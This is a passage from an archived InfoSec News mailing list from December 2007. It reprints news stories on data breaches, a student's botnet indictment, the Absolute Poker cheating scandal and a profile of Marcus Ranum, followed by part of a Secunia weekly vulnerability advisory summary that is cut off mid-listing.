hackers broke into the U.S. online recruitment site's password-protected library and stole the personal information of at least 1.3 million job seekers. September: Contact information for more than 6.3 million customers of the Omaha-based online brokerage firm TD Ameritrade Holding Corp. was stolen after a company database was hacked. November: Britain's tax and customs service announced it lost disks containing banking and personal data of 25 million people. From alerts at infosecnews.org Thu Dec 6 04:04:58 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] After hacking incident, server security boosted Message-ID: http://media.www.dailypennsylvanian.com/media/storage/paper882/news/2007/12/04/News/After.Hacking.Incident.Server.Security.Boosted-3130557.shtml By Jessica Sidman The Daily Pennsylvanian 12/4/07 Although the University improved computer security after a Penn student allegedly caused a server crash in February 2006, a similar type of attack could still cause problems for even the largest Web servers. Engineering junior Ryan Goldstein was indicted last month for computer-fraud conspiracy after he allegedly helped a New Zealand hacker nicknamed "AKILL" carry out the attack using a botnet - a virtual network of virus-infected computers controlled from a central, remote location. Hackers can use a botnet for sending spam, identity theft or denial-of-service attacks. Goldstein's alleged hacking caused an inundation of traffic on the Engineering School's server, leading to a server crash. The Engineering staff overlooked the increase in traffic because of recent modifications to the Engineering School's network at the time, according to an affidavit filed by FBI agent and computer-crimes specialist Jason Stroud. University technicians made several changes at the time and continue to make security improvements as they learn of new threats, IT Senior Director Helen Anderson wrote in an e-mail. In addition, Engineering students must now register for permission to run CGI script, a technology used in web servers. But a large attack could still potentially cripple the server. "Web servers are sized for their normal usage rate plus extra capacity for busy times," Anderson said. "A botnet of more than a million computers is enough to cause trouble for even the largest Web servers." Goldstein used a fellow student's username and password to gain access to a University server, Stroud reported. The user logged in 57,958 times in four days, with 13,289 failed attempts, from computers in North America, Europe, Africa, Asia and Latin America and then downloaded unusual files onto the Penn server. The inundation of traffic caused the server to crash. "It's been likened to trying to drink from a fire hose," FBI special agent JJ Klaver said. "You can shut down an entire computer network by flooding it with input." The Penn server attack denied service to 4,000 students, faculty and staff members. However, an attack on a corporate server, such as Amazon.com, could cause a company enormous economic losses, said Fred Cate, the director of the Center for Applied Cybersecurity Research at Indiana University School of Law. Similar attacks can also be used as online vandalism, political protests or to hinder corporate competitors. Goldstein pleaded not guilty to the computer-fraud conspiracy charges, and he is still attending classes. He faces a maximum sentence of five years in prison or a $250,000 fine. Copyright 2007 The Daily Pennsylvanian From alerts at infosecnews.org Thu Dec 6 04:05:13 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Aussie company comes under fire for probing scandalous poker site Message-ID: http://www.itnews.com.au/News/66328,aussie-company-comes-under-fire-for-probing-scandalous-poker-site.aspx By Liz Tay 5 December 2007 The engagement of Australian consultancy Gaming Associates to investigate an alleged $7 million scandal has raised more questions about the integrity of Absolute Poker and its parent companies. Gaming Associates was commissioned last month to conduct an audit into a suspected security breach that gave one player full view of the cards held by his opponents. The audit comes several months after the scam was first uncovered by a group of players on the Two Plus Two online discussion boards. Current investigations have, as yet, failed to placate users of the popular U.S.-based forum. "This proposed investigation makes us uneasy for a few reasons," said Mason Malmuth of Two Plus Two Publishing. "First, according to its press release, Absolute Poker is funding the investigation directly, with no third party involved to ensure objectivity. "Finally, Two Plus Two believes that a report from Gaming Associates, an Australian company apparently dealing primarily with Antigua and Barbados companies, may not maintain the same weight and reliability as the international law firm retained by Two Plus Two." Earlier this month, Two Plus Two Publishing was approached by an Absolute Poker representative, who wanted Two Plus Two to release a statement supporting Absolute Poker on its forums, Malmuth said. Malmuth responded with a fraud investigation proposal in which Two Plus Two would act as an unbiased, non-profiting arbitrator between Absolute Poker and the investigators. The offer was declined. "Two Plus Two is essentially the only entity that would be considered unbiased in this matter. So anything done with our name on it would have much credibility," Malmuth told ITnews.com.au. "We felt this problem was bigger than Absolute and that by doing this investigation it would be good for the whole industry. "Absolute Poker has now told us that they have no interest in our proposal. So I expect nothing will come from it," he said. Gaming Associates' audit report is not expected until 7 December. In the meantime, however, the online poker community has been handing out its own version of Citizens' arrests. Fingers have been pointed at Absolute Poker's co-founder, Scott Tom, and former Operations Director, Alan 'AJ' Green, and punishments range from degradingly edited images, to accusations of drug abuse, and even to what might be perceived as threats to Tom's family. "Is this Scott's first wife and child," asks one discussion board user. "What's her name? Any previous wives and/or children? Any other weak spots besides father? Mother, siblings, other family members?" "Does anyone know AJ's educational background," another post reads. "Where did he go to college? What were his majors and/or minors?" Official statements released by Absolute Poker to its users seem to confirm allegations that an employee had been involved in the alleged security breach. "Based upon our preliminary findings, it appears that the integrity of our poker system was compromised by a high-ranking trusted consultant employed by AP whose position gave him extraordinary access to certain security systems," writes Joe Norton, owner of Tokwiro Enterprises ENRG, which holds 100 per cent interest in Absolute Poker. "We consider this security breach to be a horrendous and inexcusable offence," he said. Absolute Poker is currently in the process of reimbursing players who were affected by the cheating account. It is yet to be seen if the scandal leaves a permanent scar on online poker, which requires a great deal of trust between players, their opponents, and gaming platforms. From alerts at infosecnews.org Fri Dec 7 01:12:09 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] US helps enhance cops skills vs cyber-terrorism Message-ID: http://www.abs-cbnnews.com/storypage.aspx?StoryId=101545 By EDITH REGALADO The Philippine Star 12/6/2007 DAVAO CITY - The United States is helping enhance the capabilities of policemen in Southern Mindanao in the fight against cyber-terrorism, which has been widely used by terrorists in their operations. Chief Superintendent Andres Caro II, Southern Mindanao regional police director, said the US State Departments Anti-Terrorism Assistance (ATA) program has jointly developed with the Anti-Terrorism Office of the Philippine Public Safety College a training course for local policemen that would improve their skills in resolving incidents related to acts of cyber-terrorism. Since its inception in 1983, the US State Departments ATA program has reportedly trained over 50,000 foreign police and security forces from over 141 countries to combat, deter and solve terrorist crimes in their respective countries. Caro told The STAR that at least 40 police officers from the different city and provincial police units in Southern Mindanao are completing tomorrow their five-day training course under the ATA program. The course gave the police officers an overview of the process of securing a terrorism-related crime scene that may involve the seizure of electronic or digital evidence. Caro said the "cyber crime incident response course" is relevant since terrorist groups have gone online to communicate with each other, spread propaganda, recruit new members, secure financial support, and issue orders. Edward Schlachter, manager of the US Embassys ATA program, said the training puts an emphasis on proper evidence collection techniques and other basic investigative and documentation activities, including properly shutting down systems and identifying the many types of media that may contain evidence. "The training and skills you will gain here will help you follow proper evidence procedures to ensure that criminals who utilize computers and digital devices are prosecuted to the full extent of the law," Schlachter told the over 40 participants in the five-day cyber crime incident response course. From alerts at infosecnews.org Fri Dec 7 01:12:47 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Law & Order - No ID Theft Reported From Stolen Computers Message-ID: http://www.modbee.com/local/story/143953.html December 06, 2007 Employees at a Modesto mortgage company that had computer equipment stolen last month say they believe information on the equipment can't be used for identity theft. Matt Crawford, broker at All-American Mortgage, said the information on a stolen computer server was password protected, so it would be difficult for someone to access it. He said he had no reason to believe a thief would have such a password. A burglar broke into All-American's Coffee Road office sometime during the weekend of Nov. 10 and stole the server, a modem and a wireless router. Crawford said the company warned hundreds of clients whose information was on the computer about the break-in and theft, but has received no reports of identity theft. "That doesn't eliminate the possibility that it could still happen," said Crawford, who added that company officials still are determining whose information was on the server. Crawford said he believes the thief or thieves stole the equipment as a way to disrupt All-American's operations rather than for resale value or identity theft. He said Modesto police are investigating the break-in. [...] From alerts at infosecnews.org Fri Dec 7 01:13:04 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Ranum's Wild Security Ride Message-ID: http://www.darkreading.com/document.asp?doc_id=140640 By Kelly Jackson Higgins Senior Editor Dark Reading December 5, 2007 Most equestrians ride English or Western style -- Marcus Ranum prefers Western-Medieval. The security industry icon best known for his pioneering work in firewalls will start training this spring to reach his goal of shooting a Mongolian recurve bow at a target while on horseback. But first he has to desensitize his horse to the loud snapping sound the bow makes. "I have no idea if this is going to work," says the 45-year-old Ranum, who as a kid participated in Medieval reenactments, and boasts of being one of the first of his friends to score the Dungeons & Dragons series of books back then. Ranum fell into horses in much the same way he landed in security, not by design. Although he ultimately made a name for himself in firewall and intrusion detection technology, Ranum says security -- like horses -- was never really his thing. "My interest was in systems administration and making things work, and security was a side effect of that," says Ranum, who lives in a self-described "Ted Kaczynski-style compound" in rural Pennsylvania with his horses, dogs, and cats. "I considered it a sideline. But unfortunately, it became my focus." He doesn't take credit for inventing the firewall -- only for synthesizing and streamlining the concepts of a firewall into the DEC SEAL, which he did while working on DEC's internal Internet gateway. "This whole business of calling me the inventor is wrong... It was some marketing BS," says Ranum, who designed and deployed the DEC SEAL in 1990, which is considered by some to be the first commercial firewall. "The DEC SEAL was interesting because it had a part number and a manual and corporation behind it," he says, which at the time was unique. He's currently the chief security officer for Tenable Security, where he acts as "advice-giver" for Tenable developers and helps teach customers how to use the company's Nessus vulnerability scanner. But he says overall, he sees the value of his work in security as ultimately short-term: "Computer security is going to disappear after a while," he says. Ranum has found a kindred spirit in Bruce Schneier on this fatalistic view of the security industry -- Schneier is well-known for his controversial view that security shouldn't be a separate market and instead be incorporated into IT products. The two regularly stage point/counterpoint columns where they debate hot industry topics. "Bruce and I agree on a lot of stuff," Ranum says. "Sometimes we have to come up with stuff to disagree on" for our column, he says. (See Schneier On Schneier.) But it's a different story when it comes to vulnerability researchers: Ranum is vocal about his distaste for their work. "If they are so freaking smart, they should be writing firewall and free executable software and giving it away," he says. He argues that vulnerability research only hurts software developers and has basically twisted the industry's view on security: "They've managed to convince customers that they are supposed to be grateful," he says. "But it's [vulnerability research] making software vastly more expensive" to buy, he says. Ranum says hacking never appealed to him. The closest he ever got to doing some hacking of his own, he says, was when he was an undergraduate at Johns Hopkins University and tweaked the Cloak program to clean up his logs and cover his tracks when he played Rogue on the university's VAX machines. "That way I could disappear when I was playing games on the VAX," he says. "That's hard to say I was hacking since I didn't have to break in to" use the machine, he says. "Even then -- as now -- I never thought hacking was very interesting," he says. Ranum says security really boils down to this: "Security is very simple: Don't do something stupid and you should be just fine," he says. Personality Bytes * What scares Ranum most: "There's a lot of outsourcing happening, and we've de-skilled our federal workforce. That scares the hell out of me. We should be worried about how we spend our money on the best and brightest in the government." * On cyberwarfare: "How can you dare talk about fighting cyberwarfare when college kids in China can penetrate the Defense Department network like Swiss cheese?" * What most people don't know about him: "I'd rather be an artist." * Biggest pet peeve: "Intellectual dishonesty." * Biggest regret: "I wish I had patented some of my work." * Favorite hangout: "Home." * Comfort food: "Tapioca pudding." * Music: "I dont download music. I buy it and rip CDs. The latest thing I bought was Robert Plant and Alison Krause's [CD]." * Wheels: "A '74 Belarus 547 tractor, and a GMC Suburban." * PC or Mac: "I hate all of them... I have an eight-year-old laptop." * What Ranum would like to be most known for: "Telling the truth." From alerts at infosecnews.org Fri Dec 7 01:13:20 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:49 2008 Subject: [ISN] Secunia Weekly Summary - Issue: 2007-49 Message-ID: ======================================================================== The Secunia Weekly Advisory Summary 2007-11-29 - 2007-12-06 This week: 74 advisories ======================================================================== Table of Contents: 1.....................................................Word From Secunia 2....................................................This Week In Brief 3...............................This Weeks Top Ten Most Read Advisories 4.......................................Vulnerabilities Summary Listing 5.......................................Vulnerabilities Content Listing ======================================================================== 1) Word From Secunia: New blog entry: Vendors still use the "legal" weapon In these days, one would have believed that vendors have learned the lesson not to threaten with legal actions to withhold and suppress significant information about vulnerabilities in their products. Well, nonetheless, Secunia just received a sequel of letters from Autonomy, likely not known to many, but it is the software company that supplies the "Swiss Army Knife" in handling and opening documents in well known software like IBM Lotus Notes and Symantec Mail Security. ...[more information in the full blog]... Our response to these claims and accusations Despite Autonomy's unsubstantiated legal threats, Secunia will quite legally continue to do vulnerability research in Autonomy products and any other products of interest. Naturally, Secunia will also continue to publish research articles and advisories in an unbiased, balanced, accurate, and truthful manner as we serve one purpose only: To provide accurate and reliable Vulnerability Intelligence to our customers and the Internet in general. Secunia is in continuous, ongoing, and positive dialogues with most vendors including large professional organisations like Microsoft, IBM, Adobe, Symantec, Novell, Apple, and CA. All understand and respect the need for informing the public about vulnerabilities and prefer to co-ordinate and synchronise the publication with important Vulnerability Intelligence sources such as Secunia rather than battling to keep things secret. It is truly sad to see that certain vendors like Autonomy still behave like many software vendors did back in the previous millennium. Read more and see the correspondance: http://secunia.com/blog/15/ ======================================================================== 2) This Week in Brief: Some vulnerabilities have been acknowledged in Novell BorderManager, which can be exploited by malicious people to bypass certain security restrictions or compromise a vulnerable system. An unspecified error in Novell Client Trust can be exploited to execute arbitrary code. This may be related to a prior Secunia advisory in the same application reported early last month: http://secunia.com/advisories/27468/ An error in the handling of full-width and half-width unicode-encoded HTTP traffic can be exploited to bypass certain security controls. This may be related to a prior Secunia advisory on the same software reported in early September 2007: http://secunia.com/advisories/26698/ Novell also reports that proxy authentication and access controls are bypassed when requests come through another proxy. Patches are available in Support Pack5 Interim Release 1. Users are urged to apply updates as soon as possible. For more information: http://secunia.com/advisories/27963/ -- A highly critical vulnerability has been reported in avast! Home/Professional, which can be exploited by malicious people to compromise a vulnerable system. The vulnerability is caused due to an error within the handling of specially crafted TAR files. This can be exploited to corrupt heap memory via certain unspecified TAR fields. The vendor has released a patch solving this vulnerability in versions prior to 4.7.1098. For more information: http://secunia.com/advisories/27929/ Secunia has constructed the Secunia Personal Software Inspector, which you can use to check if your personal system is vulnerable: https://psi.secunia.com/ Corporate users can request for a trial of the Secunia Network Software Inspector, which you can use to check which systems in your network are vulnerable: http://secunia.com/network_software_inspector/ -- A highly critical vulnerability has been reported in OpenOffice, which potentially can be exploited by malicious people to compromise a user's system. The vulnerability is caused due to an unspecified error in the HSQLDB database engine and can be exploited to execute arbitrary static Java code via a specially crafted database document. A fixed version is available for users. For more information: http://secunia.com/advisories/27928/ Secunia has constructed the Secunia Personal Software Inspector, which you can use to check if your personal system is vulnerable: https://psi.secunia.com/ Corporate users can request for a trial of the Secunia Network Software Inspector, which you can use to check which systems in your network are vulnerable: http://secunia.com/network_software_inspector/ -- A moderately critical vulnerability has been reported in Cisco Security Agent for Windows, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system. The vulnerability is caused by a boundary error in an unspecified system driver used by the application. This can be exploited to cause a buffer overflow via a specially crafted packet sent to port 139/TCP or 445/TCP, and successful exploitation may allow execution of arbitrary code. The vulnerability is reported in all versions of Cisco Security Agent for Windows. For more information: http://secunia.com/advisories/27947/ Corporate users are urged to request for a trial of the Secunia Network Software Inspector, which you can use to check which systems in your network are vulnerable: http://secunia.com/network_software_inspector/ -- VIRUS ALERTS: During the past week Secunia collected 171 virus descriptions from the Antivirus vendors. However, none were deemed MEDIUM risk or higher according to the Secunia assessment scale. ======================================================================== 3) This Weeks Top Ten Most Read Advisories: 1. [SA27755] Apple QuickTime RTSP "Content-Type" Header Buffer Overflow 2. [SA27842] Linux Kernel "isdn_net_setcfg()" Buffer Overflow Vulnerability 3. [SA27863] rsync Two Security Bypass Vulnerabilities 4. [SA27875] FTP Admin Multiple Vulnerabilities 5. [SA27860] IBM Lotus Notes Client for Linux Insecure File Permissions 6. [SA27873] Asterisk Postgres Realtime Engine SQL Injection 7. [SA27827] Asterisk Call Detail Record Postgres SQL Injection 8. [SA27829] Cisco Unified IP Phone Extension Mobility Weakness 9. [SA27883] Hitachi JP1/Cm2/Network Node Manager Unspecified Cross-Site Scripting 10. [SA27872] rPath update for idle and python ======================================================================== 4) Vulnerabilities Summary Listing Windows: [SA27963] Novell BorderManager Multiple Vulnerabilities [SA27929] avast! Home/Professional TAR File Processing Heap Corruption [SA27930] HTTP File Server File Upload Directory Traversal Vulnerability [SA27923] Absolute News Manager .NET Multiple Vulnerabilities [SA27911] Snitz Forums 2000 "BuildTime" SQL Injection Vulnerability [SA27947] Cisco Security Agent Unspecified System Driver Buffer Overflow Vulnerability [SA27917] SonicWALL Global VPN Client Configuration File Format String Vulnerability [SA27901] Microsoft Web Proxy Auto-Discovery Feature Security Issue [SA27935] Citrix EdgeSight Configuration File Information Disclosure Weakness UNIX/Linux: [SA27944] SUSE update for MozillaFirefox [SA27933] Mandriva update for openssl [SA27931] Debian update for openoffice.org and hsqldb [SA27916] Red Hat update for openoffice.org2 [SA27914] Red Hat update for openoffice.org and hsqldb [SA27875] FTP Admin Multiple Vulnerabilities [SA27965] SUSE Update for Multiple Packages [SA27950] Gentoo update for cacti [SA27943] Debian update for wesnoth [SA27936] Ubuntu update for perl [SA27920] Fedora update for wesnoth [SA27919] Fedora update for kernel [SA27910] Squid Cache Update Denial of Service Vulnerability [SA27896] Slackware update for rsync [SA27891] Debian update for cacti [SA27888] SUSE update for kernel [SA27887] Ubuntu update for cairo [SA27880] Cairo PNG Image Processing Integer Overflow [SA27927] SUSE update for samba [SA27937] Ubuntu update for mono [SA27912] SUSE update for kernel [SA27892] Debian update for asterisk [SA27890] Red Hat update for htdig [SA27882] Mandriva update for apache [SA27879] FreeBSD sys_dev_random Random Data Replay Vulnerability [SA27915] Xen "mov_to_rr" Security Bypass Vulnerability [SA27913] Red Hat update for kernel [SA27899] Zsh difflog.pl Insecure Temporary Files [SA27897] Claws Mail sylprint.pl Insecure Temporary Files [SA27948] Debian update for zabbix [SA27903] Zabbix "UserParameter" Privilege Escalation Weakness [SA27952] Gentoo update for hugin [SA27939] OpenVMS for Integrity Servers Denial of Service Vulnerabilities [SA27921] Avaya Products Xterm Security Bypass Security Issue [SA27908] Linux Kernel "do_coredump()" Information Disclosure [SA27886] Mandriva update for vixie-cron [SA27884] Mac OS X Local Denial of Service Vulnerability [SA27877] Solaris 10 Linux Branded Zones Denial of Service Other: [SA27904] F5 FirePass 4100 SSL VPN Cross-Site Scripting Vulnerabilities [SA27898] Cisco IP Phone 7940 SIP INVITE Denial of Service Vulnerability [SA27926] Sun SPARC Enterprise XCP Firmware Denial Of Service Vulnerabilities [SA27945] Nokia N95 SIP Message Processing Denial of Service Weakness Cross Platform: [SA27928] OpenOffice Database Document Processing Unspecified Code Execution [SA27895] tellmatic "tm_includepath" File Inclusion Vulnerabilities [SA27878] VLC Media Player ActiveX Plugin and FLAC Vulnerabilities [SA27876] p.mapper "_SESSION[PM_INCPHP]" File Inclusion [SA27951] vbDrupal "taxonomy_select_nodes()" SQL Injection [SA27949] SineCms SQL Injection and Script Insertion [SA27932] Drupal "taxonomy_select_nodes()" SQL Injection [SA27924] HP Select Identity Unspecified Unauthorised Access Vulnerability [SA27909] Beehive Forum SQL Injection and Unspecified Vulnerabilities [SA27905] Typespeed Division By Zero Denial of Service [SA27881] Seditio "pag_sub[]" SQL Injection Vulnerability [SA27873] Asterisk Postgres Realtime Engine SQL Injection [SA27953] Drupal Shoutbox Module Script Insertion Vulnerabilities [SA27941] IBM Lotus Sametime Meeting WebRunMenuFrame Page Cross-Site Scripting [SA27925] Jetty Multiple Vulnerabilities [SA27918] Fusion News Cross-Site Request Forgery [SA27906] Apache HTTP Method Request Entity Too Large Cross-Site Scripting [SA27902] CiscoWorks Common Services Cross-Site Scripting Vulnerability [SA27900] IBM Tivoli Netcool Security Manager Unspecified Cross-Site Scripting [SA27889] e2fsprogs libext2fs Integer Overflow Vulnerabilities [SA27883] Hitachi JP1/Cm2/Network Node Manager Unspecified Cross-Site Scripting [SA27874] CRM-CTT "CheckCustomerAccess()" Security Bypass [SA27907] Firefox Charset Inheritance Cross-Site Scripting Security Issue ======================================================================== 5) Vulnerabilities Content Listing Windows:-- [SA27963] Novell BorderManager Multiple Vulnerabilities Critical: Highly critical Where: From remote Impact: Security Bypass, System access Released: 2007-12-06 Some vulnerabilities have been reported in Novell BorderManager, which can be exploited by malicious people to bypass certain security restrictions or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/27963/ -- [SA27929] avast! Home/Professional TAR File Processing Heap Corruption Critical: Highly critical Where: From remote Impact: System access Released: 2007-12-05 A vulnerability has been reported in avast! Home/Professional, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/27929/ -- [SA27930] HTTP File Server File Upload Directory Traversal Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2007-12-06 Luigi Auriemma has reported a vulnerability in HTTP File Server, which can be exploited by malicious users to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/27930/ -- [SA27923] Absolute News Manager .NET Multiple Vulnerabilities Critical: Moderately critical Where: From remote Impact: Cross Site Scripting, Manipulation of data, Exposure of system information, Exposure of sensitive information Released: 2007-12-05 Some vulnerabilities have been reported in Absolute News Manager .NET, which can be exploited by malicious people to conduct cross-site scripting and SQL injection attacks, or to disclose sensitive information. Full Advisory: http://secunia.com/advisories/27923/ -- [SA27911] Snitz Forums 2000 "BuildTime" SQL Injection Vulnerability Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2007-12-04 Soroush Dalili has discovered a vulnerability in Snitz Forums, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/27911/ -- [SA27947] Cisco Security Agent Unspecified System Driver Buffer Overflow Vulnerability Critical: Moderately critical Where: From local network Impact: DoS, System access Released: 2007-12-06 A vulnerability has been reported in Cisco Security Agent for Windows, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/27947/ -- [SA27917] SonicWALL Global VPN Client Configuration File Format String Vulnerability Critical: Less critical Where: From remote Impact: System access Released: 2007-12-05 A vulnerability has been discovered in SonicWALL GLobal VPN Client, which potentially can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/27917/ -- [SA27901] Microsoft Web Proxy Auto-Discovery Feature Security Issue Critical: Less critical Where: From remote Impact: Security Bypass, Exposure of sensitive information Released: 2007-12-04 A security issue has been reported in Microsoft's Web Proxy Auto-Discovery (WPAD) feature, which can be exploited by malicious people to conduct man-in-the-middle (MITM) attacks. Full Advisory: http://secunia.com/advisories/27901/ -- [SA27935] Citrix EdgeSight Configuration File Information Disclosure Weakness Critical: Not critical Where: Local system Impact: Exposure of sensitive information Released: 2007-12-05 A weakness has been reported in Citrix EdgeSight, which can be exploited by malicious, local users to disclose sensitive information. Full Advisory: http://secunia.com/advisories/27935/ UNIX/Linux:-- [SA27944] SUSE update for MozillaFirefox Critical: Highly critical Where: From remote Impact: Cross Site Scripting, DoS, System access Released: 2007-12-06 SUSE has issued an update for MozillaFirefox. This fixes some vulnerabilities, which can be exploited by malicious people to conduct cross-site request forgery and cross-site scripting attacks or potentially compromise a user's system. Full Advisory: http://secunia.com/advisories/27944/ -- [SA27933] Mandriva update for openssl Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2007-12-05 Mandriva has issued an update for openssl. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/27933/ -- [SA27931] Debian update for openoffice.org and hsqldb Critical: Highly critical Where: From remote Impact: System access Released: 2007-12-06 Debian has issued an update for openoffice.org and hsqldb. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/27931/ -- [SA27916] Red Hat update for openoffice.org2 Critical: Highly critical Where: From remote Impact: System access Released: 2007-12-06 Red Hat has issued an update for openoffice.org2. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/27916/ -- [SA27914] Red Hat update for openoffice.org and hsqldb Critical: Highly critical Where: From remote Impact: System access Released: 2007-12-06 Red Hat has issued an update for openoffice.org and hsqldb. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/27914/ -- [SA27875] FTP Admin Multiple Vulnerabilities Critical: Highly critical Where: From remote Impact: Security Bypass, Cross Site Scripting, Exposure of system information, Exposure of sensitive information, System access Released: 2007-11-30 Omni has discovered some vulnerabilities in FTP Admin, which can be exploited by malicious users to compromise a vulnerable system, and by malicious people to conduct cross-site scripting attacks and bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/27875/ -- [SA27965] SUSE Update for Multiple Packages Critical: Moderately critical Where: From remote Impact: Security Bypass, Cross Site Scripting, Exposure of sensitive information, DoS, System access Released: 2007-12-06 SUSE has issued an update for multiple packages. This fixes a security issue and some vulnerabilities, which can be exploited by malicious people to disclose potentially sensitive information, conduct cross-site scripting attacks, cause a DoS (Denial of Service), and potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/27965/ -- [SA27950] Gentoo update for cacti Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2007-12-06 Gentoo has issued an update for cacti. This fixes a vulnerability, which potentially can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/27950/ -- [SA27943] Debian update for wesnoth Critical: Moderately critical Where: From remote Impact: Exposure of sensitive information Released: 2007-12-06 Debian has issued an update for wesnoth. This fixes a vulnerability, which can be exploited by malicious people to disclose potentially sensitive information. Full Advisory: http://secunia.com/advisories/27943/ -- [SA27936] Ubuntu update for perl Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2007-12-05 Ubuntu has issued an update for perl. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/27936/ -- [SA27920] Fedora update for wesnoth Critical: Moderately critical Where: From remote Impact: Exposure of system information, DoS, System access Released: 2007-12-04 Fedora has issued an update for wesnoth. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service), disclose potentially sensitive information, or potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/27920/ -- [SA27919] Fedora update for kernel Critical: Moderately critical Where: From remote Impact: DoS Released: 2007-12-04 Fedora has issued an update for the kernel. This fixes some vulnerabilities, which can be exploited by malicious, local users and by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/27919/ -- [SA27910] Squid Cache Update Denial of Service Vulnerability Critical: Moderately critical Where: From remote Impact: DoS Released: 2007-12-04 A vulnerability has been reported in Squid, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/27910/ -- [SA27896] Slackware update for rsync Critical: Moderately critical Where: From remote Impact: Security Bypass, DoS, System access Released: 2007-12-03 Slackware has issued an update for rsync. This fixes some vulnerabilities, which can be exploited by malicious people to bypass certain security restrictions or potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/27896/ -- [SA27891] Debian update for cacti Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2007-12-03 Debian has issued an update for cacti. This fixes a vulnerability, which can be exploited by malicious people to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/27891/ -- [SA27888] SUSE update for kernel Critical: Moderately critical Where: From remote Impact: DoS, System access Released: 2007-12-04 SUSE has issued an update for the kernel. This fixes some vulnerabilities, which can be exploited by malicious, local users to cause a DoS (Denial of Service) and by malicious people to cause a DoS and potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/27888/ -- [SA27887] Ubuntu update for cairo Critical: Moderately critical Where: From remote Impact: System access Released: 2007-12-04 Ubuntu has issued an update for cairo. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise an application using the library. Full Advisory: http://secunia.com/advisories/27887/ -- [SA27880] Cairo PNG Image Processing Integer Overflow Critical: Moderately critical Where: From remote Impact: System access Released: 2007-11-30 A vulnerability has been reported in Cairo, which potentially can be exploited by malicious people to compromise an application using the library. Full Advisory: http://secunia.com/advisories/27880/ -- [SA27927] SUSE update for samba Critical: Moderately critical Where: From local network Impact: System access Released: 2007-12-06 SUSE has issued an update for samba. This fixes some vulnerabilities, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/27927/ -- [SA27937] Ubuntu update for mono Critical: Less critical Where: From remote Impact: System access, DoS Released: 2007-12-05 Ubuntu has issued an update for mono. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/27937/ -- [SA27912] SUSE update for kernel Critical: Less critical Where: From remote Impact: Unknown, Security Bypass, Privilege escalation, DoS, System access Released: 2007-12-04 SUSE has issued an update for the kernel. This fixes a weakness, a security issue, and some vulnerabilities, where one has unknown impacts and others can be exploited by malicious, local users to bypass certain security restrictions, cause a DoS (Denial of Service), and gain escalated privileges, or by malicious people to cause a DoS or potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/27912/ -- [SA27892] Debian update for asterisk Critical: Less critical Where: From remote Impact: Manipulation of data Released: 2007-12-03 Debian has issued an update for asterisk. This fixes a vulnerability, which can be exploited by malicious users to conduct SQL injection attacks. Full Advisory: http://secunia.com/advisories/27892/ -- [SA27890] Red Hat update for htdig Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2007-12-04 Red Hat has issued an update for htdig. This fixes a vulnerability, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/27890/ -- [SA27882] Mandriva update for apache Critical: Less critical Where: From remote Impact: DoS Released: 2007-12-04 Mandriva has issued an update for apache. This fixes a vulnerability, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/27882/ -- [SA27879] FreeBSD sys_dev_random Random Data Replay Vulnerability Critical: Less critical Where: From local network Impact: Exposure of sensitive information Released: 2007-11-30 A vulnerability has been reported in FreeBSD, which can be exploited by malicious people to disclose potentially sensitive information. Full Advisory: http://secunia.com/advisories/27879/ -- [SA27915] Xen "mov_to_rr" Security Bypass Vulnerability Critical: Less critical Where: Local system Impact: Security Bypass Released: 2007-12-05 A vulnerability has been reported in Xen, which can be exploited by malicious, local users to bypass certain security restrictions. Full Advisory: http://secunia.com/advisories/27915/ -- [SA27913] Red Hat update for kernel Critical: Less critical Where: Local system Impact: Security Bypass, DoS Released: 